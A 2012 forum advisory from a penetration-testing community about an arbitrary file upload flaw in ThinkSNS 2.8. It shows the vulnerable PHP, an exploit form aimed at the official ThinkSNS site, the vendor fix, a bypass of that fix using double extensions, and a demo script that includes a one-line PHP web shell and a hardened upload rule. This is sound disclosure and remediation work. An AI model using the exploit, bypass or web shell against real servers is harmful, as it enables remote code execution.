中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title:
ThinkSNS 2.8 arbitrary file upload vulnerability and fix
Author:
admin
Time:
2012-12-4 11:12
When an image is uploaded with a weibo post, it is validated only in the front end; the server side performs no security filtering at all.

\api\StatusesApi.class.php

    function uploadpic(){
        if( $_FILES['pic'] ){
            // perform the upload
            $savePath = $this->_getSaveTempPath();
            // the stored extension is everything after the FIRST dot of the client-supplied name
            $filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
            if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
            {
                $result['boolen'] = 1;
                $result['type_data'] = 'temp/'.$filename;
                $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
            } else {
                $result['boolen'] = 0;
                $result['message'] = '上传失败';   // 'upload failed'
            }
        }else{
            $result['boolen'] = 0;
            $result['message'] = '上传失败';   // 'upload failed'
        }
        return $result;
    }
The uploadpic() method does not validate the file type in any way: the extension of the stored file is copied verbatim from the client-supplied name, so a .php upload is saved as a .php file.
Build a form, choose any file, and submit it to

/index.php?app=w3g&mod=Index&act=doPost

The address of the uploaded file can then be found in the newly posted weibo (strip the small_ / middle_ thumbnail prefix from the image URL to reach the original file).
After logging in to the official ThinkSNS weibo (t.thinksns.com), build the following form:

    <form action="http://t.thinksns.com/index.php?app=w3g&mod=Index&act=doPost" method="post" enctype="multipart/form-data">
        <textarea name="content">test</textarea>
        file: <input id="file" type="file" name="pic" />
        <input type="submit" value="Post" />
    </form>

Submit it with the file of your choice, then remove the thumbnail prefix (small_) from the image URL in the resulting post.
Fix:

\api\StatusesApi.class.php

    function uploadpic(){
        /**
         * 20121018 @yelo
         * added upload type validation
         */
        $pathinfo = pathinfo($_FILES['pic']['name']);
        $ext = $pathinfo['extension'];
        $allowExts = array('jpg', 'png', 'gif', 'jpeg');

        $uploadCondition = $_FILES['pic'] && in_array(strtolower($ext),$allowExts,true);

        if( $uploadCondition ){
            // perform the upload
            $savePath = $this->_getSaveTempPath();
            $filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
            if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
            {
                $result['boolen'] = 1;
                $result['type_data'] = 'temp/'.$filename;
                $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
            } else {
                $result['boolen'] = 0;
                $result['message'] = '上传失败';   // 'upload failed'
            }
        }else{
            $result['boolen'] = 0;
            $result['message'] = '上传失败';   // 'upload failed'
        }
        return $result;
    }

Note that the whitelist is applied to the last extension returned by pathinfo(), while the stored file name is still built from everything after the first dot of the client-supplied name, so a name such as shell.php.jpg passes the check and is saved as <md5>.php.jpg; whether the web server then executes it depends on its handler configuration. The file contents are never inspected, and because @copy() is tried first and succeeds, the is_uploaded_file() protection of move_uploaded_file() is never exercised.
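As an added example for this page (not ThinkSNS code and not part of the original post), the following PHP script reproduces the two extension rules seen above, the unchecked first-dot rule of 2.8 and the pathinfo() whitelist of the fix, and contrasts them with a hardened rule that derives the stored name from the whitelist match plus a random token only, verifies the bytes with getimagesize(), and saves via move_uploaded_file() alone. The test file names, the 1x1 GIF, the PHP payload and the saveUpload() helper are constructed for illustration; saveUpload() only does real work inside an HTTP request, since is_uploaded_file() is false for files created on the command line.

```php
<?php
// Added example for this page (not ThinkSNS code). It reproduces the two
// extension-derivation rules from StatusesApi::uploadpic() above and contrasts
// them with a hardened rule; the names, payloads and helper functions here are
// constructed for illustration.
declare(strict_types=1);

const ALLOW_EXTS = ['jpg', 'jpeg', 'png', 'gif'];

// ThinkSNS 2.8 (vulnerable): the stored extension is everything after the
// FIRST dot of the client-supplied name, with no check at all.
function extOriginal(string $clientName): string
{
    return substr($clientName, strpos($clientName, '.') + 1);
}

// 2012-10-18 fix: whitelist on the LAST extension (pathinfo), lowercased;
// the stored name is still built with the extOriginal() rule.
function fixAccepts(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ALLOW_EXTS, true);
}

// Hardened rule (added here): the stored name comes from the whitelist match
// and a random token only, and the bytes must be an image of that same type.
function hardenedName(string $clientName, string $tmpPath): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOW_EXTS, true)) {
        return null;                       // claimed extension not allowed
    }
    $info = @getimagesize($tmpPath);       // parses headers, never executes the file
    if ($info === false) {
        return null;                       // not a parseable image at all
    }
    $typeToExt = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    $realExt = $typeToExt[$info[2]] ?? null;
    if ($realExt === null || $realExt !== ($ext === 'jpeg' ? 'jpg' : $ext)) {
        return null;                       // content does not match the claimed type
    }
    return bin2hex(random_bytes(16)) . '.' . $realExt;
}

// Shape for the real handler (hypothetical helper): move_uploaded_file() only,
// never copy(), so a path that did not come through PHP's upload machinery is refused.
function saveUpload(array $file, string $saveDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $name = hardenedName($file['name'], $file['tmp_name']);
    if ($name === null || !move_uploaded_file($file['tmp_name'], $saveDir . '/' . $name)) {
        return null;
    }
    return $name;
}

// Demo: a constructed 1x1 GIF and a constructed PHP payload, under several names.
$gif = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;";
$php = "<?php system(\$_GET['c']); ?>";
$gifTmp = tempnam(sys_get_temp_dir(), 'up'); file_put_contents($gifTmp, $gif);
$phpTmp = tempnam(sys_get_temp_dir(), 'up'); file_put_contents($phpTmp, $php);

printf("%-16s %-12s %-7s %-10s %s\n", 'client name', 'orig ext', 'fix', 'hard(gif)', 'hard(php)');
foreach (['shell.php', 'shell.jpg.php', 'shell.php.jpg', 'SHELL.PHP', 'photo.gif'] as $n) {
    printf("%-16s %-12s %-7s %-10s %s\n", $n, extOriginal($n),
        fixAccepts($n) ? 'pass' : 'reject',
        hardenedName($n, $gifTmp) === null ? 'reject' : 'accept',
        hardenedName($n, $phpTmp) === null ? 'reject' : 'accept');
}
unlink($gifTmp); unlink($phpTmp);
```

Run it with the php CLI. The printed table shows shell.php.jpg passing the fix's whitelist while extOriginal() still yields php.jpg for its stored extension, and shows the hardened rule rejecting every PHP payload regardless of name, as well as the GIF bytes when they are claimed to be a .jpg.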
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2